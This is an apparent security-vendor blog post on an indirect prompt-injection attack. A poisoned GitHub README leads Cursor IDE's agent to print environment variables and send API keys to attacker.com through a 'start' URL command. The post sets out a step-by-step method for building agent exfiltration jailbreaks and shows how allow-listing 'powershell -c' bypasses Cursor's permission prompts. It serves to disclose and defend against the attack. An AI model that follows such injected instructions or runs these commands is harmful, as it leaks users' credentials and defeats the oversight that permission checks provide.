Key Points
- A malicious README in a GitHub repository can exploit Cursor IDE’s LLM agent to exfiltrate sensitive environment variables like API keys by running terminal commands and opening external browser tabs.
- The attack leverages indirect prompt injection through a poisoned README, tricking the agent into running commands such as extracting environment data and sending it via GET requests to an attacker’s web server.
- Cursor’s permission model is vulnerable because repeated prompts encourage users to allow broadly defined commands like
powershell -c
, which then enables nearly any terminal action without further user confirmation. - The exploit demonstrates a broader risk present in agentic LLM-powered tools where access to private data, exposure to untrusted content, and external communication all converge.
- 0DIN Scanner can help identify and block this type of LLM-driven data exfiltration by scanning untrusted inputs and detecting adversarial prompt patterns.
During the past year, the lethal trifecta has become one of the most discussed concepts in AI security for all the good reasons. It describes the combination of capabilities that makes AI agents vulnerable to data theft: access to private data, exposure to untrusted content, and the ability to communicate externally. Any time these three ingredients come together, exploitation becomes possible.
AI-powered code editors check all three boxes. They have access to private data: environment variables, config files, credentials stored locally. They're exposed to untrusted content: repositories, documentation, code from the internet. And they can communicate externally through terminal access, which means HTTP requests, browser invocation, and more.
Cursor is one example. A malicious GitHub repository with a poisoned README can instruct the agent to dump environment variables, extract API keys, and exfiltrate them to an attacker's server. The victim just has to point Cursor at the repo. The agent does the rest.
The Methodology: A Primer on Finding Agentic Data Exfiltration Bugs
The general methodology for finding agentic breaks, specifically data exfiltration, follows a consistent pattern. Here's how 0DIN Mastermind Edward Morris approached it when developing this technique:
First, map the attack surface. Identify the data sources the agent can access. This might include email, Google Drive, OneDrive, and so on. In this case, Cursor has access to the terminal, which means it can access local storage and, notably, environment variables on Windows.
Once you have the target data source, you need a way to exfiltrate it.
This can take many forms. One example is link rendering, where data is appended to a URL and then shown to the user, either by rendering an image that triggers a GET request to a web server containing the data, or by presenting a hyperlink that triggers a GET request when clicked.
In this case, since Cursor has terminal access, data can be exfiltrated by opening a new tab in the user's default browser using the command start https://attacker.com/<data>. This opens a new tab with the URL, creating a GET request to the web server and sending the data along with it.
Next, find the source for the indirect prompt injection, meaning what the attacker will serve to the agent. This can vary: malicious emails, websites, or in this case, a GitHub repo created by the attacker. The important part is that the agent must be able to access this source.
Finally, craft the prompt injection. This is the jailbreaking
part and it requires creativity. Theoretically, there are infinite prompts that can achieve this due to the adversarial subspace idea. In practice, a few jailbreak types work particularly well for getting an agent to exfiltrate data. One of the most effective, and the one used here, is an error resolution workflow. The GitHub repo tells Cursor to fix or solve an error and supplies commands for Cursor to run in order to do so.
The important part of this step is persistence. It's simply a problem of finding the right prompt that works. A useful technique is building up.
Start with an indirect prompt injection that tells the agent to do a benign action, such as printing a message back to the user. Is this harmful? No. Is it still an indirect prompt injection with the agent following external instructions? Yes. From there, gradually introduce more of the desired actions for data exfiltration until it works or you hit a block. Once you hit a block, refine or change the prompt and repeat until it works.
Explore AI security with the Scanner Datasheet
The datasheet offers insight into the challenges and solutions in AI security.
Download Datasheet
Root Cause
Unlike traditional vulnerabilities, there is no hard-and-fast bug here that can simply be patched. This exploit works because of a combination of factors.
The most important and hardest issue to fix
is not necessarily a bug, but the nature of large language models themselves. Because LLMs are non-deterministic models, they are especially prone to attacks that manipulate context and outputs through prompt injection, including plainly worded jailbreaks. These attacks instruct the model to perform unsafe actions or achieve malicious goals, such as data exfiltration.
While this vulnerability can be mitigated using similarly non-deterministic approaches, such as safety fine-tuning the model, there is likely always going to be some residual risk that the model remains vulnerable.
The attack surface being natural language creates a many-to-one situation, where many different prompt injections can lead the model to perform the same unsafe action. Models can be fine-tuned against specific known attacks, but there will always be many more prompts that can still succeed in achieving the same malicious objective.
Because of this, designers of agentic systems must look for additional ways to fortify their systems beyond relying solely on the underlying LLM.
This brings us to the second root cause: permissions.
Cursor attempts to maintain permission hygiene by prompting the user whenever it wants to run a command in the terminal.
When Cursor wants to run a command that is not yet in the allow list, it prompts the user with two options: run it once, or run it and add it to the allow list.
The problem arises when you consider the user's intention when using Cursor, which is to save time.
Having to manually allow each seemingly simple and benign command, such as cd, ls, or ipconfig, is time-consuming. Most end users will have these commands in their allow list.
In addition to this, Cursor allows commands to be executed using powershell -c "<command>", and it will often alternate between using this form and not using it for basic terminal commands. Cursor registers the beginning of this command, specifically powershell -c, as the primary portion of the command. As a result, if a user has added powershell -c to the allow list, anything that follows it will be automatically allowed.
This becomes problematic when you consider that a large proportion of users are likely to have powershell -c in their allow list. This effectively circumvents the entire permission control verification system that Cursor has intentionally designed.
Safeguard Your GenAI Systems
Connect your security infrastructure with our expert-driven vulnerability detection platform.
Exploit Steps
[attacker] sets up a web server to receive GET requests.
[attacker] sets up a malicious README on a public GitHub repo containing the prompt injection.
[victim] passes the link to the public repo to Cursor.
[cursor] runs the workflow outlined in the prompt injection:
- First, it runs
Get-ChildItem Env:in the terminal, which prints all environment variables. - Then it searches through the output for API keys.
- Finally, it appends the API key to
start https://attacker.com/verify/<API_KEY>, which opens a webpage to the attacker's website on the victim's default browser. The GET request sent to open this page contains the API key, which is logged by the attacker's web server.
[attacker] receives the API key via web server.
Implications
This vulnerability pattern applies to any agentic system that combines the aforementioned trifecta: access to sensitive data, exposure to untrusted content, and the ability to communicate externally. AI code editors are a natural fit for all three.
The core tension is that these systems are useful precisely because they can act autonomously on content if desired. That same autonomy becomes a liability when the content is adversarial. That gap between designed security and practiced security is where these breaks tend to live. The latest agentic systems aren't missing controls - it's that often the controls don't survive contact with real usage patterns. Users will always be tempted to optimize for speed. Permission prompts that fire too often get allowlisted, sandboxes that hamper utility get disabled. The security model has to account for that, not just assume compliance.